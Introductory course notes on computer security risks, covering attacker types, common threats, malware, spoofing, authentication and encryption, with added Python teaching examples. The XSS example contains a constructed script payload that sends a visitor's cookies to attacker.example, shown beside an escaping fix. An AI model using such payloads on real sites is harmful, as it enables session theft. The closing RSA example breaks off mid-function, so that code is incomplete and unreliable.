CC101 Chapter 1: Malware and Computer Society

The document discusses various digital security risks, including types of cybercriminals such as hackers, crackers, and corporate spies, as well as common cybersecurity threats like malware, password theft, and phishing attacks. It outlines the nature of these threats, their potential impacts, and provides safeguards against them, emphasizing the importance of protective measures for individuals and organizations. Additionally, it highlights the risks associated with internet and network attacks, including botnets, denial of service attacks, and spoofing.

Uploaded by danielatparoni

MALWARE AND COMPUTER SOCIETY

DIGITAL SECURITY RISK

A digital security risk is any event or action that could
cause a loss of or damage to computer hardware, software,
data, information or processing capability.

Computer crime is any illegal act involving the use of a computer
(or similar device).

Cybercrime
Online or Internet-based illegal acts.

Hackers
• Typically, someone who accesses a computer or network
illegally.
• Has advanced computer and networking skills.
• Some are hired, with the owner's authorization, to test systems
and networks for vulnerabilities as part of security consulting
(penetration testing).

Crackers
• Similar to hackers: someone who accesses a computer or
network illegally BUT with malicious intent (destroying data
or stealing information).
• Has advanced computer and networking skills.
• The same term is applied to those who reverse engineer software
to modify it, e.g. to remove license restrictions.

Script kiddies
• Same malicious intent as crackers, but without the skills and
knowledge.
• Use prewritten scripts and tools instead.
• The focus is more on the ends than the means.
• Target computers with known, unpatched vulnerabilities that
their tools can exploit.

Corporate spies
• Hired to steal sensitive and confidential company data and
information, usually on behalf of a competitor.
• Have advanced computer and networking skills.

Unethical employees
• Employees who exceed their authorization by breaking into the
company's network to access other computers on the network or
the company's servers.
• Reasons: the challenge; financial gain; a grudge (disgruntled
employee).

Cyberextortionist
• Uses the Internet to carry out their schemes.
• A perpetrator sends threats to an individual or company to
extract a demand (typically monetary in nature), for example by
threatening to leak stolen data or to disrupt services.
• Ransom: holding your information "captive" using strong
encryption and selling the victim the key (ransomware).

Cyberterrorists
• Use the Internet or a network to destroy or damage
computers.
• Motive: a cause or belief; political reasons.
• Typically highly organized groups with funds and expertise.
15 COMMON CYBERSECURITY RISKS
1. Malware

We'll start with the most prolific and common form of security threat:
malware. It has been around for as long as computers have been networked and
remains a consistent problem. Malware is any unwanted program that gets onto a
target system, usually without the owner's knowledge, and then does something the
owner did not ask for. This ranges from denying access to programs, deleting files
and stealing information, to spreading itself to other systems.
2. Password Theft

"I've been hacked!" is a common conclusion when you log in to an account,
only to find your password changed and details lost. The reality is that an unwanted
third party managed to steal or guess your password and has since run amok with
the information. It is far worse for an enterprise, which may lose sensitive data.
Weak or reused passwords, phishing and credential-stealing malware are the usual
routes in.
3. Traffic Interception

Also known as "eavesdropping," traffic interception occurs when a third
party listens in on information sent between a user and a host, for example on an
open Wi-Fi network or over an unencrypted protocol. The kind of information stolen
varies with the traffic but is often used to take logins or other valuable data; the
usual defense is encrypting the connection end to end, as TLS does.

4. Phishing Attacks
Phishing scams are an older attack method and rely on social engineering
to achieve their goal. Typically, an end user receives a message or email that
requests sensitive data, such as a password, or that leads to a look-alike login page.
Often the phishing message appears official, using legitimate-looking addresses and
branding. This compels the individual to click links and unwittingly give away
sensitive information.
5. Cross Site Attack

Referred to as an XSS (cross-site scripting) attack. A third party targets a
website that fails to validate or encode user-supplied input before placing it in a
page, so attacker-controlled script ends up stored on the site or reflected back from
a crafted link. When a regular user visits that page, their browser runs the script
with the site's privileges, where it can steal the session, alter the page or
redirect the user. XSS is not caused by a lack of encryption (HTTPS does not stop
it); it is an output-encoding problem in the application itself. The goal is to
either disrupt standard services or steal user information.
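As an added illustration (example code written for this edit, not taken from the slides or any project they cite), the following Python snippet shows the reflected form of the bug described above beside its fix. The page template, the function names and the two sample queries are hypothetical; the only real library call is html.escape.

```python
# Added example (not from the original slides): a reflected XSS bug in a
# search-results page, shown beside the hardened version. Function names,
# the page template and the sample queries are all hypothetical/constructed.
from html import escape

# Minimal page template; {query} is where user input lands (HTML body context).
PAGE = "<html><body><h1>Results for: {query}</h1></body></html>"

# Constructed inputs: a benign search and a payload that exfiltrates cookies.
BENIGN_QUERY = "cheap flights"
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_results_unsafe(query: str) -> str:
    """Vulnerable: the raw query is interpolated into the document, so any
    markup in it is parsed and executed by the visitor's browser."""
    return PAGE.format(query=query)


def render_results_safe(query: str) -> str:
    """Hardened: encode the input for the HTML context it is inserted into.
    The browser then shows the payload as text instead of running it."""
    return PAGE.format(query=escape(query, quote=True))


def executes_script(document: str) -> bool:
    """Crude check used below: does a live <script> tag survive in the page?"""
    return "<script>" in document.lower()


if __name__ == "__main__":
    for q in (BENIGN_QUERY, XSS_PAYLOAD):
        print("unsafe:", render_results_unsafe(q))
        print("safe  :", render_results_safe(q))
```

The encoding must match the context: html.escape is right for text between tags and inside quoted attributes, but input placed into a URL, a JavaScript string or a style block needs the encoder for that context instead.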

6. Zero-Day Exploits
A "zero-day vulnerability" is a flaw that is unknown to the vendor, so no
patch exists when attackers start using it (the vendor has had "zero days" to fix
it). A zero-day exploit is a targeted attack against a system, network or software
that takes advantage of such a flaw to cause unusual behavior, damage data or steal
information. Because signatures and patches lag behind, defense relies on layered
controls and on patching quickly once a fix ships.
8. SQL Injection

An SQL injection attack is essentially data manipulation, implemented to
access information that isn't meant to be available. Malicious third parties supply
input (a form field, a URL parameter) that the application pastes into an SQL
"query" (the request string sent to the database server); quote and comment
characters in that input change the structure of the query, so the database returns,
alters or deletes data the attacker should never have reached. The fix is to send
user input as bound parameters rather than splicing it into the SQL text.
9. Social Engineering

Similar to phishing, social engineering is the umbrella term for
attempting to deceive users into giving away sensitive details or performing an
action on the attacker's behalf. This can occur on any platform (email, phone,
in person), and malicious parties will often go to great lengths to accomplish
their goals, such as using social-media information to make the pretext convincing.
10. MitM Attack

A Man-in-the-Middle attack occurs when a third party inserts itself into a
session between client and host so that the traffic passes through the attacker. On a
local network this is commonly done with spoofing (answering ARP or DNS requests
with the attacker's address, or running a rogue Wi-Fi access point); the attacker
then relays the conversation while reading or altering it. For example, a user
logging in to a bank over a connection the attacker controls would hand the attacker
their banking credentials, unless the connection is protected by TLS with a
certificate the client actually verifies.
11. Ransomware

A nasty variant of malware, ransomware installs itself on a user system or
network. Once installed, it encrypts files or otherwise prevents access to
functionality (in part or whole) until a "ransom" is paid to the third parties
holding the key. Offline, tested backups are the main recovery path.

12. Cryptojacking
Cryptojacking is an attempt to install malware that forces the infected
system to perform "crypto-mining," the computation by which some crypto-currencies
are earned. Like other malware, it infects unprotected systems. It is deployed
because crypto-mining is hardware intensive and costs electricity, so the attacker
offloads that cost onto the victims' machines.
13. Watering Hole Attack
Generally used to target organizations, watering hole attacks occur when a group
compromises websites a particular organization's staff frequently use. The goal, much
like a cross-site attack, is to deliver a malicious payload from the infected sites to
the intended victims when they visit.

14. Drive-By Attack

In a drive-by attack, malicious code is delivered onto a system or device simply
by visiting a web page. The distinction is that no further action is needed on the
user's end; typically the page exploits a vulnerability in the browser or a plug-in,
whereas other attacks need the user to click a link or download an executable.

15. Trojan Virus

Trojan malware (strictly a Trojan horse, not a self-replicating virus) attempts
to deliver its payload by disguising itself as legitimate software. One technique used
was an "alert" that the user's system was compromised by malware, recommending a
scan, whereby the "scanner" actually delivered the malware.
INTERNET AND NETWORK ATTACK

Information transmitted over networks has a higher degree
of security risk than information kept on an organization's premises.
In an organization, network administrators usually take measures to
protect a network from security risks. On the Internet, where no
central administrator is present, the security risk is greater.
Internet and network attacks that jeopardize security include
computer viruses, worms, Trojan horses, and rootkits; botnets;
denial of service attacks; back doors; and spoofing. The following
sections address these computer security risks and suggest
measures organizations and individuals can take to protect their
computers while on the Internet or connected to a network.
Computer Viruses, Worms, Trojan Horses, and Rootkits

Every unprotected computer is susceptible to the first type of
computer security risk: a computer virus, worm, Trojan horse, and/or
rootkit.
• A computer virus is a potentially damaging computer program that
affects, or infects, a computer negatively by altering the way the
computer works without the user's knowledge or permission. A virus
attaches itself to other files or programs and spreads when those are
run or shared; it may damage files and system software, including the
operating system.
• A worm is a program that copies itself repeatedly, for example in
memory or across a network, usually by exploiting a vulnerability in a
network service with no user action needed. It uses up resources and
may shut down the computer or network.
• A Trojan horse (named after the Greek myth) is a program that
hides within or looks like a legitimate program. A certain condition
or action usually triggers the Trojan horse. Unlike a virus or
worm, a Trojan horse does not replicate itself to other computers.
• A rootkit is a program that hides in a computer, concealing its own
presence (and often that of other malware) from the operating system
and security tools, and typically allows someone from a remote location
to take full control of the computer. Once the rootkit is installed, the
rootkit author can execute programs, change settings, monitor activity,
and access files on the remote computer while ordinary tools show nothing.
Computer viruses, worms, Trojan horses, and rootkits are
classified as malware (short for malicious software), which are
programs that act without a user’s knowledge and deliberately alter
the computer’s operations. Unscrupulous programmers write
malware and then test it to ensure it can deliver its payload. The
payload is the destructive event or prank the program is intended to
deliver. A computer infected by a virus, worm, Trojan horse, or
rootkit often has one or more of the following symptoms:
• Operating system runs much slower than usual
• Available memory is less than expected
• Files become corrupted
• Screen displays an unusual message or image
• Unknown programs or files mysteriously appear
• Music or unusual sound plays randomly
• Existing programs and files disappear
• Programs or files do not work properly
• System properties change
• Operating system does not start up
• Operating system shuts down unexpectedly

Currently, more than 300,000 Web sites can infect your
computer with known viruses, worms, Trojan horses, rootkits, and
other malware. These malicious programs deliver their payload on a
computer in a variety of ways: when a user (1) opens an infected
file, (2) runs an infected program, (3) boots the computer with
infected removable media inserted in a drive or plugged in a port,
(4) connects an unprotected computer to a network, or (5) when a
certain condition or event occurs, such as the computer’s clock
changing to a specific date. A common way computers become
infected with viruses and other malware is through users opening
infected e-mail attachments
SAFEGUARDS AGAINST COMPUTER VIRUSES AND OTHER MALWARE
Users can take several precautions to protect their home
and work computers and mobile devices from these malicious
infections.
• Do not start a computer with removable media, such as optical
discs and USB flash drives, in the drives or ports
• Never open an e-mail attachment unless you are expecting the
attachment and it is from a trusted source.
• Take special care on social media. Never open files without
checking their source.
• Close websites when the browser tells you they’re not secure.
• Do not accept files from people you don’t know.
• Back up your files regularly.
• Stay informed about new virus alerts and virus hoaxes.
• Install antivirus or anti-malware software
• Keep your antivirus software up to date
• Run antivirus scans regularly
• Keep your operating system up to date
• Protect your network
• Think before you click
• Keep your personal information secure
• Don't use unsecured Wi-Fi for anything sensitive
• Use strong passwords, a different one for each account

• BOTNET A botnet is a group of compromised computers
connected to a network such as the Internet that are used
as part of a network that attacks other networks, usually for
nefarious purposes. A compromised computer, known as a
zombie, is one whose owner is unaware the computer is
being controlled remotely by an outsider. Cybercriminals
use botnets to send spam via e-mail, spread viruses and
other malware, or commit a denial of service attack.

• DENIAL OF SERVICE ATTACK A denial of service attack, or DoS
attack, is an assault whose purpose is to disrupt computer access to an
Internet service such as the Web or e-mail. Perpetrators carry out a DoS
attack in a variety of ways. For example, they may use an unsuspecting
computer to send an influx of malformed data messages or useless traffic
to a computer network; when many compromised computers (a botnet) do this
at once, the attack is a distributed denial of service, or DDoS. The victim
computer network slows down considerably and eventually becomes unresponsive
or unavailable, blocking legitimate visitors from accessing the network.
Perpetrators have a variety of motives for carrying out a DoS attack. Those
who disagree with the beliefs or actions of a particular organization claim
political anger motivates their attacks. Some perpetrators use the attack
as a vehicle for extortion. Others simply want the recognition, even
though it is negative.

• BACK DOOR A back door is a program or set of instructions in a program
that allow users to bypass security controls when accessing a program,
computer, or network. Once perpetrators gain access to unsecure
computers, they often install a back door or modify an existing program to
include a back door, which allows them to continue to access the computer
remotely without the user’s knowledge.
• SPOOFING Spoofing is a technique intruders use to make their network or
Internet transmission appear legitimate to a victim computer or network. E-mail
spoofing occurs when the sender's address or other components of the e-mail
header are altered so that it appears the e-mail originated from a different
sender; it works because plain SMTP does not verify the From header, which is
why receiving mail servers check SPF, DKIM and DMARC. E-mail spoofing commonly
is used for virus hoaxes, spam, and phishing scams. IP spoofing occurs when an
intruder computer fools a network into believing its IP address is associated
with a trusted source, for example to slip past address-based access rules.
Perpetrators of spoofing also trick their victims into interacting with a phony
Web site.
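Added example, not part of the original deck: the checks a receiving mail system can run on a message to spot a forged From header, applied to two constructed messages. The domains, addresses and the Authentication-Results layout (the common method=result form most mail servers write) are assumptions, and spoofing_indicators and the other names are hypothetical.

```python
# Added example (not from the original slides): checks that a receiving
# system can run on an incoming message to spot e-mail spoofing. The two
# messages below are constructed, the domains are fictitious, and the
# Authentication-Results layout assumed is the common "method=result" form.
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

LEGIT = b"""Return-Path: <billing@bank.example>
Authentication-Results: mx.recipient.example; spf=pass smtp.mailfrom=bank.example; dkim=pass header.d=bank.example
From: Bank Billing <billing@bank.example>
To: customer@recipient.example
Subject: Your statement is ready

See the attached statement.
"""

SPOOFED = b"""Return-Path: <bounce@mail-relay.example>
Authentication-Results: mx.recipient.example; spf=fail smtp.mailfrom=mail-relay.example; dkim=none
From: Bank Billing <billing@bank.example>
Reply-To: verify-now@bank-example-support.example
To: customer@recipient.example
Subject: Urgent: verify your account

Click here to verify your account.
"""


def domain_of(header_value) -> str:
    """Domain part of the first address in a header, lower-cased ('' if none)."""
    addr = parseaddr(str(header_value or ""))[1]
    return addr.rpartition("@")[2].lower()


def auth_verdicts(msg) -> dict:
    """Extract the spf=... and dkim=... verdicts from Authentication-Results."""
    verdicts = {}
    for clause in str(msg.get("Authentication-Results", "")).split(";"):
        clause = clause.strip()
        for method in ("spf", "dkim"):
            if clause.startswith(method + "="):
                verdicts[method] = clause.split("=", 1)[1].split()[0].lower()
    return verdicts


def spoofing_indicators(raw: bytes) -> list:
    """Return short tags for each sign that the visible From was forged."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_domain = domain_of(msg.get("From"))
    found = []
    # The envelope sender (Return-Path) is what SMTP actually used; the
    # displayed From header is free text the sender can set to anything.
    return_domain = domain_of(msg.get("Return-Path"))
    if return_domain and return_domain != from_domain:
        found.append("return-path-mismatch")
    # Replies routed somewhere other than the claimed sender is a phishing tell.
    reply_domain = domain_of(msg.get("Reply-To"))
    if reply_domain and reply_domain != from_domain:
        found.append("reply-to-mismatch")
    verdicts = auth_verdicts(msg)
    if verdicts.get("spf") != "pass":
        found.append("spf=" + verdicts.get("spf", "missing"))
    if verdicts.get("dkim") != "pass":
        found.append("dkim=" + verdicts.get("dkim", "missing"))
    return found


if __name__ == "__main__":
    print("legit  :", spoofing_indicators(LEGIT))
    print("spoofed:", spoofing_indicators(SPOOFED))
```

The Authentication-Results header is only trustworthy when your own border mail server wrote it; strip any copy that arrives from outside before relying on it, or an attacker can supply a header that says spf=pass.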
Safeguards against Botnets, DoS Attacks, Back Doors, and Spoofing
To defend against botnets, DoS attacks, improper use of back doors,
and spoofing, users can implement firewall solutions and install
intrusion detection software. The following sections discuss these
safeguards.

FIREWALLS A firewall is hardware and/or software that protects a
network's resources from intrusion by users on another network such as the
Internet, by allowing only the traffic that matches a set of rules (for
example by address, port and direction) and dropping the rest. All networked
and online computer users should implement a firewall solution.
UNAUTHORIZED ACCESS AND USE

Another type of computer security risk is
unauthorized access and use. Unauthorized access is the
use of a computer or network without permission.
Unauthorized use is the use of a computer or its data for
unapproved or possibly illegal activities. Unauthorized
use includes a variety of activities: an employee using an
organization’s computer to send personal e-mail
messages, an employee using the organization’s word
processing software to track his or her child’s soccer
league scores, or someone gaining access to a bank
computer and performing an unauthorized transfer.
SAFEGUARDS AGAINST UNAUTHORIZED ACCESS AND USE
Organizations take several measures to help prevent
unauthorized access and use. At a minimum, they should have
a written acceptable use policy (AUP) that outlines the
computer activities for which the computer and network may
and may not be used. An organization’s AUP should specify
the acceptable use of computers by employees for personal
reasons. Some organizations prohibit such use entirely.
Others allow personal use on the employee’s own time
such as a lunch hour. Other measures that safeguard against
unauthorized access and use include firewalls and intrusion
detection software, which were discussed in the previous
section, and identifying and authenticating users.
IDENTIFYING AND AUTHENTICATING USERS
Many organizations use access controls to minimize the chance
that a perpetrator intentionally may access or an employee accidentally
may access confidential information on a computer. An access control is a
security measure that defines who can access a computer, when they can
access it, and what actions they can take while accessing the computer. In
addition, the computer should maintain an audit trail that records in a file
both successful and unsuccessful access attempts. An unsuccessful
access attempt could result from a user mistyping his or her password, or it
could result from a hacker trying thousands of passwords. Organizations
should investigate unsuccessful access attempts immediately to ensure
they are not intentional breaches of security. They also should review
successful access for irregularities, such as use of the computer after
normal working hours or from remote computers
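Added example, not from the original slides: the audit-trail review described above, written as detection logic over constructed log lines. The line format, the office address range, the working-hours window and the failure threshold are all assumptions for the demonstration; a real system's log format will differ and only the parser needs to change.

```python
# Added example (not from the original slides): reviewing an access-control
# audit trail the way the text recommends. The log format, thresholds,
# office network and the log lines themselves are all constructed for the
# demonstration; adapt parse_line to whatever your system actually writes.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple
import ipaddress

# One constructed line format: "<ISO timestamp> <OK|FAIL> user=<name> src=<ip>"
SAMPLE_LOG = """\
2024-03-04T09:12:01 FAIL user=alice src=10.0.0.15
2024-03-04T09:12:03 OK user=alice src=10.0.0.15
2024-03-04T22:41:10 FAIL user=admin src=203.0.113.7
2024-03-04T22:41:11 FAIL user=admin src=203.0.113.7
2024-03-04T22:41:12 FAIL user=admin src=203.0.113.7
2024-03-04T22:41:13 FAIL user=admin src=203.0.113.7
2024-03-04T22:41:14 FAIL user=admin src=203.0.113.7
2024-03-04T22:41:15 FAIL user=admin src=203.0.113.7
2024-03-04T22:41:20 OK user=admin src=203.0.113.7
2024-03-05T13:05:40 OK user=bob src=10.0.0.22
2024-03-05T02:15:00 OK user=carol src=10.0.0.9
"""

OFFICE_NETWORK = ipaddress.ip_network("10.0.0.0/8")  # assumed on-premises range
WORK_HOURS = range(8, 18)                             # 08:00-17:59 is "normal"
FAIL_THRESHOLD = 5                                    # failures in WINDOW = guessing, not typos
WINDOW = timedelta(minutes=10)


class Event(NamedTuple):
    ts: datetime
    ok: bool
    user: str
    src: str


def parse_line(line: str) -> Event:
    ts, result, user_kv, src_kv = line.split()
    return Event(datetime.fromisoformat(ts), result == "OK",
                 user_kv.split("=", 1)[1], src_kv.split("=", 1)[1])


def review_audit_trail(log_text: str) -> list:
    """Return (finding, user, src) tuples in time order."""
    events = sorted((parse_line(line) for line in log_text.splitlines() if line.strip()),
                    key=lambda e: e.ts)
    findings = []
    recent_fails = defaultdict(list)  # (user, src) -> failure timestamps inside WINDOW
    for ev in events:
        key = (ev.user, ev.src)
        if not ev.ok:
            fails = [t for t in recent_fails[key] if ev.ts - t <= WINDOW] + [ev.ts]
            recent_fails[key] = fails
            # A single mistyped password is noise; a burst is someone guessing.
            if len(fails) == FAIL_THRESHOLD:
                findings.append(("brute-force", ev.user, ev.src))
            continue
        # Successful access: check what preceded it and where/when it happened.
        if len(recent_fails.pop(key, [])) >= FAIL_THRESHOLD:
            findings.append(("success-after-brute-force", ev.user, ev.src))
        if ev.ts.hour not in WORK_HOURS:
            findings.append(("after-hours", ev.user, ev.src))
        if ipaddress.ip_address(ev.src) not in OFFICE_NETWORK:
            findings.append(("remote-source", ev.user, ev.src))
    return findings


if __name__ == "__main__":
    for finding in review_audit_trail(SAMPLE_LOG):
        print(finding)
```

On the sample, alice's single typo produces nothing, while the admin login at 22:41 from 203.0.113.7 is flagged four times (guessing burst, success right after it, after hours, off-site), which is the combination that should be investigated immediately rather than reviewed later.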
Many systems implement access controls using a two-
phase process called identification and authentication.
Identification is the user's claim of who they are (for example,
a user name). Authentication verifies that the individual is the
person he or she claims to be, using one or more of three kinds of
evidence: something the user knows (user names and passwords),
something the user has (possessed objects), and something the user
is (biometric devices). Combining two of these kinds is multi-factor
authentication. The technique(s) an organization uses should
correspond to the degree of risk associated with unauthorized access.
USER NAMES AND PASSWORDS
A user name, or user ID (identification), is a unique
combination of characters, such as letters of the alphabet or
numbers, that identifies one specific user. A password is a
private combination of characters associated with the user
name that allows access to certain computer resources.
Most multiuser (networked) operating systems require
that users correctly enter a user name and a password before
they can access the data, information, and programs stored on
a computer or network.
Multiuser systems typically require that users select their
own passwords. Users typically choose an easy-to-remember word
or series of characters for passwords. If your password is too
obvious, however, such as your initials or birthday, others can guess
it easily. Easy passwords make it simple for hackers and other
intruders to break into a system. Hackers use automated tools to
guess passwords, working through dictionaries of common words and
previously leaked passwords before trying every combination. Thus,
you should select a password carefully. Longer passwords provide
greater security than shorter ones. Each character added to a password
multiplies the number of possible combinations and therefore the
length of time it might take for someone, or for a hacker's computer,
to guess the password; a password that appears in a dictionary gains
nothing from length, though, because it is tried first.
In addition to a user name and password, some systems ask users to
enter one of several pieces of personal information. Such items can include a
spouse's first name, a birth date, a place of birth, or a mother's maiden name.
As with a password, if the user's response does not match the information on
file, the system denies access. Because these answers are often public or easy to
discover (for example from social media), they add little security on their own.
Some Web sites use a CAPTCHA to slow down automated guessing of
passwords. A CAPTCHA, which stands for Completely Automated Public Turing
test to tell Computers and Humans Apart, is a program that verifies user input
is not computer generated. A CAPTCHA displays a series of distorted
characters and requires the user to enter the characters correctly to continue
using the Web site. For visually impaired users, the CAPTCHA text can be
read aloud. Because unscrupulous individuals attempt to circumvent or decode
CAPTCHAs, developers continually are seeking ways to make them more
secure or develop alternative authentication techniques.
POSSESSED OBJECTS
A possessed object is any item that you must carry to gain
access to a computer or computer facility. Examples of possessed
objects are badges, cards, smart cards, and keys. The card you use
in an automated teller machine (ATM) is a possessed object that
allows access to your bank account.
Possessed objects often are used in combination with
personal identification numbers. A personal identification number
(PIN) is a numeric password, either assigned by a company or
selected by a user. PINs provide an additional level of security. An
ATM card typically requires a four-digit PIN. PINs are passwords.
Select them carefully and protect them as you do any other
password.
BIOMETRIC DEVICES
A biometric device authenticates a person's identity by translating a
personal characteristic, such as a fingerprint, into a digital code (a template)
that is compared with the template stored in the computer for that person. If the
codes do not match closely enough, the computer denies access to the individual.
Because the match is never exact, every biometric system trades off false
rejections against false acceptances, and unlike a password a compromised
fingerprint cannot be changed.
Biometric devices grant access to programs, computers, or rooms
using computer analysis of some biometric identifier. Examples of biometric
devices and systems include fingerprint readers, hand geometry systems,
face recognition systems, voice verification systems, signature verification
systems, iris recognition systems, and retinal scanners. Many grocery
stores, retail stores, and gas stations now use biometric payment, where
the customer’s fingerprint is read by a fingerprint reader that is linked to a
specific payment method such as a checking account or credit card.
SOFTWARE THEFT

Another type of computer security risk is software theft.
Software theft occurs when someone steals software media,
intentionally erases programs, illegally copies a program, or illegally
registers and/or activates a program. One form of software theft
involves someone physically stealing the media that contain the
software or the hardware that contains the media, as described in
the previous section. Another form of software theft occurs when
software is stolen from software manufacturers. This type of theft,
called piracy, is by far the most common form of software theft.
Software piracy is the unauthorized and illegal duplication of
copyrighted software. A related form of software theft involves users
illegally obtaining registration numbers and/or activation codes.
SAFEGUARDS AGAINST SOFTWARE THEFT
To protect software media from being stolen, owners should
keep original software boxes and media in a secure location. All
computer users should back up their files and disks regularly, in the
event of theft.
To protect themselves from software piracy, software
manufacturers issue users license agreements. A license agreement
is the right to use the software. That is, you do not own the software.
The license agreement provides specific conditions for use of the
software, which a user must accept before using the software.
These terms usually are displayed when you install the software.
The most common type of license included with
software purchased by individual users is a single-user license
agreement, also called an end-user license agreement
(EULA). A single-user license agreement typically includes
many of the following conditions that specify a user’s
responsibility upon acceptance of the agreement.
USERS ARE PERMITTED TO:
• Install the software on only one computer. (Some license agreements
allow users to install the software on one desktop computer and one
notebook computer.)
• Make one copy of the software as a backup.
• Give or sell the software to another individual, but only if the software is
removed from the user's computer first.
USERS ARE NOT PERMITTED TO:
• Install the software on a network, such as a school computer lab.
• Give copies to friends and colleagues, while continuing to use the
software.
• Export the software.
• Rent or lease the software.
Unless otherwise specified by a license agreement, you do not
have the right to copy, loan, borrow, rent, or in any way distribute software.
Doing so is a violation of copyright law and, in many countries including the
United States, a criminal offense. Despite this, some experts estimate that for
every authorized copy of software in use, at least one unauthorized copy exists.
In an attempt to prevent software piracy, Microsoft and other manufacturers have
incorporated an activation process into many of their consumer products. During
product activation, which is conducted either online or by telephone, users provide
the software product's 25-character product key to receive an installation
identification number unique to the computer on which the software is installed.
If you are not completely familiar with your school or employer's
policies governing installation of software, check with the information
technology department or your school's technology
INFORMATION THEFT

Information theft is yet another type of computer
security risk. Information theft occurs when someone steals
personal or confidential information. An unethical company
executive may steal or buy stolen information to learn about a
competitor. A corrupt individual may steal credit card numbers
to make fraudulent purchases.
HOW DOES INFORMATION THEFT OCCUR?
There is more than one way to steal data. Some common methods are listed below:
➢ E-Commerce: You should make sure that your data is safe from prying eyes when
you sell or buy things on the Web. Carelessness, such as entering card details on a
site that is not served over HTTPS, can lead to leaking your private account information.
➢ Password cracking: Intruders can access your machine and get valuable data if it is
not password-protected or its password can be easily guessed (weak password).
➢ Eavesdropping: Data sent on insecure lines can be wiretapped and recorded. If no
encryption mechanism is used, there is a good chance of losing your password and
other private information to the eavesdropper.
➢ Laptop theft: Incidents of laptop theft from corporate firms increasingly occur, with the
valuable information stored on the laptop being sold to competitors. Carelessness and
lack of full-disk encryption on the laptop can lead to major losses for the firm.
Information theft can lead to identity theft.
IDENTITY THEFT
It is a crime in which your personal information such as your
name, social security number, date of birth, and address is stolen
and may be used by someone to assume your identity, often for the
purpose of financial gain.
It is also referred to as “identity fraud” when the stolen
identity is used to impersonate the victim. Methods a criminal may
use to steal your data over the Internet include hacking or using
spam and phishing. Social media sites and file sharing can be prime
targets for identity thieves, since users often make the assumption
of a trusted environment, sharing personal information without
understanding the consequences.
INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
Most companies attempt to prevent information theft by
implementing the user identification and authentication
controls discussed earlier in this chapter. These controls are
best suited for protecting information on computers located on
an organization’s premises. Information transmitted over
networks offers a higher degree of risk because unscrupulous
users can intercept it during transmission. To protect
information on the Internet and networks, companies and
individuals use a variety of encryption techniques.
INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
Encryption is the process of converting data that is
readable by humans into encoded characters to prevent
unauthorized access. You treat encrypted data just like any
other data. That is, you can store it or send it in an email
message. To read the data, the recipient must decrypt, or
decode it. For example, users may specify that an email
application encrypt a message before sending it securely. The
recipient’s email application would need to decrypt the
message in order for the recipient to be able to read it.
INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
In the encryption process, the unencrypted, readable
data is called plaintext. The encrypted (scrambled) data is
called ciphertext. An encryption algorithm, or cipher, is a set of
steps that can convert readable plaintext into unreadable
ciphertext. A simple encryption algorithm might switch the
order of characters or replace characters with other
characters. Encryption programs typically use more than one
encryption algorithm, along with an encryption key. An
encryption key is a set of characters that the originator of the
data uses to encrypt the plaintext and the recipient of the data
uses to decrypt the ciphertext.
INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
2 Basic Types of Encryption
1. Private Key Encryption - With private key encryption, also called
symmetric key encryption, both the originator and the recipient use the
same secret key to encrypt and decrypt the data.
2. Public Key Encryption - Public key encryption, also called
asymmetric key encryption, uses two encryption keys: a public key and
a private key. Public key encryption software generates both the private
key and the public key. A message encrypted with a public key can be
decrypted only with the corresponding private key, and vice versa. The
public key is made known to message originators and recipients. For
example, public keys may be posted on a secure webpage or a public-key
server, or they may be emailed. The private key, by contrast,
should be kept confidential.
INFORMATION THEFT
SAFEGUARDS AGAINST INFORMATION THEFT
Encryption
Some operating systems and email programs allow you to encrypt
the contents of files and messages that are stored on your computer. You
also can purchase an encryption program to encrypt files. Many browsers
use encryption when sending private information, such as credit card
numbers, over the Internet.
Mobile users today often access their company networks through a
virtual private network. When a mobile user connects to a main office using
a standard Internet connection, a virtual private network (VPN) provides the
mobile user with a secure connection to the company network server, as if
the user has a private line. VPNs help ensure that data is safe from being
intercepted by unauthorized people by encrypting data as it transmits from
a laptop, smartphone, or other mobile device.
INFORMATION THEFT
Digital Signatures and Certificates
A digital signature is an encrypted code that a person, website, or
organization attaches to an electronic message to verify the identity of the
message sender. Digital signatures often are used to ensure that an
impostor is not participating in an Internet transaction. That is, digital
signatures can help to prevent email forgery. A digital signature also can
verify that the content of a message has not changed.
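The key relationships in the two encryption types above and in the digital signature paragraph, as an added Python example that is not from the textbook: textbook RSA with small constructed primes, encrypting one byte at a time without padding so the arithmetic stays visible (production software uses vetted libraries, keys thousands of bits long and padding schemes).

```python
from __future__ import annotations

import hashlib
from math import gcd, isqrt


def _is_prime(n: int) -> bool:
    """Trial division, adequate for the small teaching primes used here."""
    return n >= 2 and all(n % k for k in range(2, isqrt(n) + 1))


def generate_keypair(p: int, q: int, e: int = 65537) -> tuple[tuple[int, int], tuple[int, int]]:
    """Derive an RSA key pair from two primes; each key is an (exponent, modulus) pair.

    The public key (e, n) may be posted anywhere; the private key (d, n) stays secret.
    """
    if p == q or not (_is_prime(p) and _is_prime(q)):
        raise ValueError("p and q must be distinct primes")
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("public exponent must be coprime to (p-1)(q-1)")
    d = pow(e, -1, phi)  # private exponent: e * d == 1 (mod phi)
    return (e, n), (d, n)


def encrypt(public_key: tuple[int, int], plaintext: bytes) -> list[int]:
    """Turn readable plaintext into ciphertext with the RECIPIENT's public key.

    Each byte is raised to e mod n on its own (no padding) so the key
    relationship is easy to follow; real systems encrypt padded blocks.
    """
    e, n = public_key
    return [pow(b, e, n) for b in plaintext]


def decrypt(private_key: tuple[int, int], ciphertext: list[int]) -> bytes:
    """Recover the plaintext with the matching private key; any other key yields garbage."""
    d, n = private_key
    values = [pow(c, d, n) for c in ciphertext]
    if any(v > 255 for v in values):
        raise ValueError("decryption did not yield bytes: wrong private key?")
    return bytes(values)


def _digest(message: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private_key: tuple[int, int], message: bytes) -> int:
    """Digital signature: the SENDER encrypts a hash of the message with the private key."""
    d, n = private_key
    return pow(_digest(message, n), d, n)


def verify(public_key: tuple[int, int], message: bytes, signature: int) -> bool:
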